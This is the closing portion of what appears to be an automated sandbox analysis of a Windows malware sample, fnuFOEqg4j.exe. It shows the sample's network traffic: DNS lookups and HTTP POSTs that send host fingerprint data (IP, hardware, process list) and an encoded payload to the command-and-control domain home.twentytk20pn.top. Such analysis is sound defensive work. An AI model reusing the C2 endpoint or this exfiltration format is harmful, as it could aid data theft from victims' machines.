                                                    Dec 20, 2024 17:06:53.168159962 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.168190956 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.168291092 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.168318987 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.168345928 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.168379068 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.168482065 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.168586016 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.168661118 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.168790102 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.168818951 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.168867111 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.168894053 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.168925047 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.169006109 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.169131994 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.169161081 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.169188976 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.169214964 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.169357061 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.169384956 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.169411898 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.169440031 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.169467926 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.169497013 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.169547081 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.169590950 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.169642925 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.169671059 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.169718027 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.169744968 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.169776917 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.169823885 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.169981003 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.170023918 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.170074940 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.170226097 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.248889923 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.248929024 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.248958111 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.249011040 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.249057055 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.249146938 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.249305964 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.249335051 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.249362946 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.249489069 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.249660015 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.249689102 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.249805927 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.249834061 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.250148058 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.250190020 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.250293016 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.250458002 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.250487089 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.250515938 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.250621080 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.250631094 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.250658989 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.250700951 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.250750065 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.250777960 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.250837088 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.250864983 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.250914097 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.250950098 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.251079082 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.251106977 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.251214027 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.251241922 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.251269102 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.251311064 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.251379967 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.251410007 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:06:53.251437902 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:07:24.121788979 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:07:24.122031927 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:07:24.122117996 CET4971180192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:07:24.122400999 CET4971180192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:07:24.242183924 CET8049711147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:07:24.812546015 CET4971680192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:07:24.935003996 CET8049716147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:07:24.935153961 CET4971680192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:07:24.936028004 CET4971680192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:07:25.055536985 CET8049716147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:07:32.938075066 CET8049716147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:07:32.938285112 CET8049716147.45.113.159192.168.2.12
                                                    Dec 20, 2024 17:07:32.938344002 CET4971680192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:07:32.938601017 CET4971680192.168.2.12147.45.113.159
                                                    Dec 20, 2024 17:07:33.058844090 CET8049716147.45.113.159192.168.2.12

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Dec 20, 2024 17:06:48.110636950 CET6164853192.168.2.121.1.1.1
                                                    Dec 20, 2024 17:06:48.110812902 CET6164853192.168.2.121.1.1.1
                                                    Dec 20, 2024 17:06:48.248334885 CET53616481.1.1.1192.168.2.12
                                                    Dec 20, 2024 17:06:48.413999081 CET53616481.1.1.1192.168.2.12
                                                    Dec 20, 2024 17:06:51.263840914 CET6165153192.168.2.121.1.1.1
                                                    Dec 20, 2024 17:06:51.263920069 CET6165153192.168.2.121.1.1.1
                                                    Dec 20, 2024 17:06:51.401454926 CET53616511.1.1.1192.168.2.12
                                                    Dec 20, 2024 17:06:51.401608944 CET53616511.1.1.1192.168.2.12
                                                    Dec 20, 2024 17:07:24.674318075 CET4932053192.168.2.121.1.1.1
                                                    Dec 20, 2024 17:07:24.674417019 CET4932053192.168.2.121.1.1.1
                                                    Dec 20, 2024 17:07:24.811418056 CET53493201.1.1.1192.168.2.12
                                                    Dec 20, 2024 17:07:24.811479092 CET53493201.1.1.1192.168.2.12

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Dec 20, 2024 17:06:48.110636950 CET192.168.2.121.1.1.10x3b33Standard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                    Dec 20, 2024 17:06:48.110812902 CET192.168.2.121.1.1.10xa5adStandard query (0)httpbin.org28IN (0x0001)false
                                                    Dec 20, 2024 17:06:51.263840914 CET192.168.2.121.1.1.10xe6b4Standard query (0)home.twentytk20pn.topA (IP address)IN (0x0001)false
                                                    Dec 20, 2024 17:06:51.263920069 CET192.168.2.121.1.1.10xa6feStandard query (0)home.twentytk20pn.top28IN (0x0001)false
                                                    Dec 20, 2024 17:07:24.674318075 CET192.168.2.121.1.1.10x4130Standard query (0)home.twentytk20pn.topA (IP address)IN (0x0001)false
                                                    Dec 20, 2024 17:07:24.674417019 CET192.168.2.121.1.1.10xe2e9Standard query (0)home.twentytk20pn.top28IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Dec 20, 2024 17:06:48.248334885 CET1.1.1.1192.168.2.120x3b33No error (0)httpbin.org98.85.100.80A (IP address)IN (0x0001)false
                                                    Dec 20, 2024 17:06:48.248334885 CET1.1.1.1192.168.2.120x3b33No error (0)httpbin.org34.226.108.155A (IP address)IN (0x0001)false
                                                    Dec 20, 2024 17:06:51.401608944 CET1.1.1.1192.168.2.120xe6b4No error (0)home.twentytk20pn.top147.45.113.159A (IP address)IN (0x0001)false
                                                    Dec 20, 2024 17:07:24.811479092 CET1.1.1.1192.168.2.120x4130No error (0)home.twentytk20pn.top147.45.113.159A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • httpbin.org
                                                    • home.twentytk20pn.top

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.1249711147.45.113.159806988C:\Users\user\Desktop\fnuFOEqg4j.exe
                                                    TimestampBytes transferredDirectionData
                                                    Dec 20, 2024 17:06:51.523880959 CET12360OUTPOST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1
                                                    Host: home.twentytk20pn.top
                                                    Accept: */*
                                                    Content-Type: application/json
                                                    Content-Length: 506466
                                                    Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 31 30 38 30 39 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                                    Data Ascii: { "ip": "8.46.123.189", "current_time": "1734710809", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 336 }, { "name": "csrss.exe", "pid": 420 }, { "name": "wininit.exe", "pid": 496 }, { "name": "csrss.exe", "pid": 504 }, { "name": "winlogon.exe", "pid": 580 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 760 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "fontdrvhost.exe", "pid": 792 }, { "name": "svchost.exe", "pid": 876 }, { "name": "svchost.exe", "pid": 928 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 372 }, { "name": "svchost.exe", "pid": 404 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": [TRUNCATED]
                                                    Dec 20, 2024 17:06:51.643711090 CET4944OUTData Raw: 78 6e 65 31 76 57 30 75 77 74 30 76 76 45 57 75 78 57 64 33 46 4a 61 33 6b 75 67 61 48 71 73 64 70 63 6f 38 4e 79 30 55 69 73 6f 39 53 30 72 34 4d 65 41 4e 49 43 76 72 57 72 61 37 34 79 76 56 55 46 72 66 54 6f 34 76 43 33 68 2b 4b 34 52 75 52 39
                                                    Data Ascii: xne1vW0uwt0vvEWuxWd3FJa3kugaHqsdpco8Ny0Uiso9S0r4MeANICvrWra74yvVUFrfTo4vC3h+K4RuR9puF1XXdc06YDtbeDb9VPBjbp+ecQeJvBeQTrUMbnFPFY6hUnSq5flkXj8XTr0m41MPX9hfDYOvCz56eOxGGktE\/elFP9N4Z8H\/EDiunh8VgMhrYPLsTTp16OaZxKOV4Krhq0YypYrDLE2xePw1WMounWy7C4yE0
                                                    Dec 20, 2024 17:06:51.643747091 CET4944OUTData Raw: 66 2b 6d 66 2b 76 38 37 33 5c 2f 77 44 31 5c 2f 77 43 46 4d 32 76 67 4d 6a 78 70 44 35 76 2b 71 34 6e 6e 5c 2f 77 41 6e 38 5c 2f 35 55 5c 2f 70 73 2b 66 79 35 59 38 66 75 5c 2f 2b 65 33 34 5c 2f 70 31 5c 2f 54 69 68 76 4d 45 61 4f 5c 2f 77 42 7a
                                                    Data Ascii: f+mf+v873\/wD1\/wCFM2vgMjxpD5v+q4nn\/wAn8\/5U\/ps+fy5Y8fu\/+e34\/p1\/TihvMEaO\/wBzyv8AlnF\/qf8APQUHQVpNkm\/YdieX5sWf3\/8AnPf3qb70jI7xp5h4j\/1\/bn\/J5FER3RvNs2J\/ruT\/AMvH0\/r\/ADo2vJjenz9c\/wDtr\/P+lBpT6\/IhbZ8mzzNnm+V9n\/5b4P8An1575o\/1exN\/+
                                                    Dec 20, 2024 17:06:51.643800974 CET4944OUTData Raw: 6e 58 55 32 69 61 6f 62 4c 57 37 46 42 66 36 64 61 75 6e 39 4d 58 37 51 33 37 50 48 37 48 58 37 49 50 77 2b 2b 4f 58 5c 2f 42 53 50 77 5c 2f 38 4c 66 68 39 38 52 5c 2f 41 76 37 54 66 77 2b 2b 47 56 6c 2b 79 46 38 44 5c 2f 47 50 77 71 30 4c 57 50
                                                    Data Ascii: nXU2iaobLW7FBf6daun9MX7Q37PH7HX7IPw++OX\/BSPw\/8Lfh98R\/Av7Tfw++GVl+yF8D\/GPwq0LWPAXw28dfFzw5J4n1fX9W8E63pOp+EdMs9PttJg8VaBposLW30ayi8Q+CdNdE1aw8r\/nN4r8SOPPEvOcTxRxbxDTzLN\/YUMPisW8ryjAcmCwtKaw\/Lh8twGDw0lTSdJctL205Sg6k583Mv9dvBmrxfwvwZjsn4B4
                                                    Dec 20, 2024 17:06:51.643996954 CET9888OUTData Raw: 35 63 66 38 41 54 4c 6a 37 51 4f 6e 2b 69 64 76 7a 37 30 78 6f 33 2b 52 42 6e 5c 2f 6c 34 38 37 50 2b 66 72 78 39 61 66 4a 76 32 34 5c 2f 65 50 35 6e 37 71 4b 53 50 75 50 38 41 50 74 2b 74 50 6a 5c 2f 65 66 63 66 65 6e 2b 6b 53 7a 47 54 6e 5c 2f
                                                    Data Ascii: 5cf8ATLj7QOn+idvz70xo3+RBn\/l487P+frx9afJv24\/eP5n7qKSPuP8APt+tPj\/efcfen+kSzGTn\/PpQdBWkkdJETyd6R\/62ST\/P\/wBb+jJP3caB\/kT\/AJ+D\/n196ftSRdn+phj\/AOekX+P6+neiON2Z0SHY4\/c\/6z\/PPpx6VPtfOX9fMCH5I9j\/ALz93+9zJ\/qJv8\/1ok+Vv9X\/AKyX97\/yw\/z6Ue
                                                    Dec 20, 2024 17:06:51.763443947 CET4944OUTData Raw: 56 76 69 58 38 63 39 51 5c 2f 5a 77 2b 46 50 68 4c 78 37 71 6e 78 53 74 66 45 76 78 4d 2b 4d 46 6a 6f 76 67 66 57 6f 76 43 76 68 32 66 77 56 38 49 50 48 66 67 33 52 66 37 54 58 34 69 2b 46 4e 4e 30 37 56 76 48 5c 2f 6a 48 77 58 6f 7a 61 6e 71 4f
                                                    Data Ascii: VviX8c9Q\/Zw+FPhLx7qnxStfEvxM+MFjovgfWovCvh2fwV8IPHfg3Rf7TX4i+FNN07VvH\/jHwXozanqOy81CzsYZb9fFvD3xW8DeIbXSZrTxf4Re\/vYNU\/tvw8mp6vb694L1TStXv9Kl0LxPFrnh3Q9Jl1KdbJdShk8K6x4o0yOxvLeG91G01eK+0uz\/Rsr8QOAK2b1+EMozvLVmmUVv7PrZPhKFajHBVKNFVZUIqGGhhK
                                                    Dec 20, 2024 17:06:51.763516903 CET4944OUTData Raw: 45 5c 2f 42 61 66 52 64 50 76 4c 72 56 72 33 34 67 5c 2f 46 4c 34 6b 36 6e 64 77 66 44 37 77 66 38 4b 49 74 4f 30 75 35 6c 38 61 61 68 34 78 38 4f 61 5a 71 33 6a 5c 2f 51 5a 78 46 70 6c 6a 66 65 43 4e 50 58 55 6f 37 72 37 66 71 5c 2f 68 37 53 74
                                                    Data Ascii: E\/BafRdPvLrVr34g\/FL4k6ndwfD7wf8KItO0u5l8aah4x8OaZq3j\/QZxFpljfeCNPXUo7r7fq\/h7StY1rvTtDXxr4F+GGjfGX9n3xR8VPGfxf8AfBHUfh14f8AHPjrUNU8C+NviB4n07wZbx+IPGEXwoPwk8W2XhrxNqtlpvitvgv8SPivf2Ia7v8ATrDVtN0rV7yw+Jfgl9Ei1Dk4jzCu8RGFSnHDZ\/mGKqexnhcuxqxF
                                                    Dec 20, 2024 17:06:51.763559103 CET4944OUTData Raw: 66 34 6f 66 74 4e 65 4d 66 6a 46 38 51 74 47 38 4d 79 5c 2f 42 37 34 4e 66 38 46 4c 50 68 35 2b 30 58 34 4b 38 50 5c 2f 44 58 34 46 4a 34 44 67 5c 2f 62 63 5c 2f 5a 74 31 62 78 48 62 61 42 34 77 30 4c 34 79 65 44 66 44 48 67 62 77 50 6f 33 78 41
                                                    Data Ascii: f4oftNeMfjF8QtG8My\/B74Nf8FLPh5+0X4K8P\/DX4FJ4Dg\/bc\/Zt1bxHbaB4w0L4yeDfDHgbwPo3xA+Nnwd8P6ffeJvhr45\/aPtrfxJ4r8G\/EL4v+AfE3xAjvNT0DTdT+nZI0lRo5USSNxh0kUOjD0ZWBVh7EEVmPoOhyRCCTRdJkhByIX06zaIHJORG0JTOSTnGcknvX8+eMPgLl3i5nnC2fYzPcdlOL4SwuMo5bTw1O
                                                    Dec 20, 2024 17:06:51.807451010 CET27192OUTData Raw: 76 42 5c 2f 67 6a 56 50 68 6a 70 5c 2f 77 5c 2f 77 44 43 47 6a 66 42 4c 34 65 5c 2f 73 30 2b 4e 52 72 74 78 2b 30 78 38 54 5c 2f 68 4a 34 51 31 37 77 50 5a 36 6a 34 38 6c 2b 4b 33 77 33 30 5c 2f 77 66 42 6f 66 78 44 74 4e 55 50 32 63 76 68 37 51
                                                    Data Ascii: vB\/gjVPhjp\/w\/wDCGjfBL4e\/s0+NRrtx+0x8T\/hJ4Q17wPZ6j48l+K3w30\/wfBofxDtNUP2cvh7QE3bND0ddzF226ZZLudurNiAZY4GWPJ7mpv7H0gSpONK03z4wRHN9htvNjBIJCSeVvUEgEhSMkA1\/KFL6GeWRzepnlbjvOKuZToYbCxrvAZbFUKFKlnVCvLD04YeFHD4nEwz7FVKuIw1KhKWKwuAxkl9bo1K9b+6M
                                                    Dec 20, 2024 17:06:51.940555096 CET8652OUTData Raw: 5c 2f 79 31 45 66 6d 5c 2f 77 42 66 66 48 72 78 54 5c 2f 75 78 6f 36 76 76 38 76 50 2b 73 69 5c 2f 5c 2f 41 46 5c 2f 35 5c 2f 43 6d 66 64 33 5c 2f 36 74 50 38 41 6c 72 46 48 5c 2f 68 5c 2f 6e 36 38 43 67 42 6d 35 50 4d 54 35 70 49 58 5c 2f 31 51
                                                    Data Ascii: \/y1Efm\/wBffHrxT\/uxo6vv8vP+si\/\/AF\/5\/Cmfd3\/6tP8AlrFH\/h\/n68CgBm5PMT5pIX\/1Q8uL\/P8An8qhjj3ffSR0\/wBb\/qvT\/wDUP\/1VNG38aSbHP\/LTn7PNz\/hR5aq3\/or1h7+3+cUHQVo1SSN\/nk2dP3n6j+oo+T7j\/c6+X3mH+PH+easyMnyfPseT\/W7M\/h2z\/KosJH8\/8af9\/pv+nr+
                                                    Dec 20, 2024 17:06:52.058811903 CET1236OUTData Raw: 58 5c 2f 39 66 35 64 36 50 75 74 76 54 37 4f 36 52 6e 37 6c 78 2b 5c 2f 5c 2f 41 46 7a 31 5c 2f 70 52 5c 2f 7a 7a 68 33 5c 2f 77 43 72 69 5c 2f 35 61 66 75 50 5c 2f 41 4e 58 2b 48 65 6e 5c 2f 41 48 6c 66 5c 2f 57 62 5c 2f 41 43 76 4e 69 6b 5c 2f
                                                    Data Ascii: X\/9f5d6PutvT7O6Rn7lx+\/\/AFz1\/pR\/zzh3\/wCri\/5afuP\/ANX+Hen\/AHlf\/Wb\/ACvNik\/54\/5\/HpWXsvKX3f8AAOghK\/65Ee4T97by8y\/1\/wA81Wkj3bH37Mf88\/8Aljj\/AD\/ntc2\/Nvfy3xiKWO39Ox\/yKrN80ezZG\/8Ayz8yP\/r1OLX6n\/PFUAzb5bIm+T\/tn\/16\/h+Pp+lP\/uI7x\/
                                                    Dec 20, 2024 17:07:24.121788979 CET194INHTTP/1.0 504 Gateway Time-out
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 54 68 65 20 73 65 72 76 65 72 20 64 69 64 6e 27 74 20 72 65 73 70 6f 6e 64 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <html><body><h1>504 Gateway Time-out</h1>The server didn't respond in time.</body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.1249716147.45.113.159806988C:\Users\user\Desktop\fnuFOEqg4j.exe
                                                    TimestampBytes transferredDirectionData
                                                    Dec 20, 2024 17:07:24.936028004 CET272OUTPOST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1
                                                    Host: home.twentytk20pn.top
                                                    Accept: */*
                                                    Content-Type: application/json
                                                    Content-Length: 128
                                                    Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 5c 2f 68 31 3e 5c 6e 54 68 65 20 73 65 72 76 65 72 20 64 69 64 6e 27 74 20 72 65 73 70 6f 6e 64 20 69 6e 20 74 69 6d 65 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                    Data Ascii: { "id1": "<html><body><h1>504 Gateway Time-out<\/h1>\nThe server didn't respond in time.\n<\/body><\/html>\n", "data": "Done1" }
                                                    Dec 20, 2024 17:07:32.938075066 CET309INHTTP/1.1 502 Bad Gateway
                                                    Server: nginx/1.22.1
                                                    Date: Fri, 20 Dec 2024 16:07:32 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 157
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.22.1</center></body></html>


                                                    HTTPS Proxied Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.124971098.85.100.804436988C:\Users\user\Desktop\fnuFOEqg4j.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-20 16:06:50 UTC52OUTGET /ip HTTP/1.1
                                                    Host: httpbin.org
                                                    Accept: */*
                                                    2024-12-20 16:06:50 UTC224INHTTP/1.1 200 OK
                                                    Date: Fri, 20 Dec 2024 16:06:50 GMT
                                                    Content-Type: application/json
                                                    Content-Length: 31
                                                    Connection: close
                                                    Server: gunicorn/19.9.0
                                                    Access-Control-Allow-Origin: *
                                                    Access-Control-Allow-Credentials: true
                                                    2024-12-20 16:06:50 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                    Data Ascii: { "origin": "8.46.123.189"}


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:11:06:44
                                                    Start date:20/12/2024
                                                    Path:C:\Users\user\Desktop\fnuFOEqg4j.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\fnuFOEqg4j.exe"
                                                    Imagebase:0x4a0000
                                                    File size:4'421'632 bytes
                                                    MD5 hash:61039D97D478405525707E3C0B4B3003
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    Disassembly

                                                    No disassembly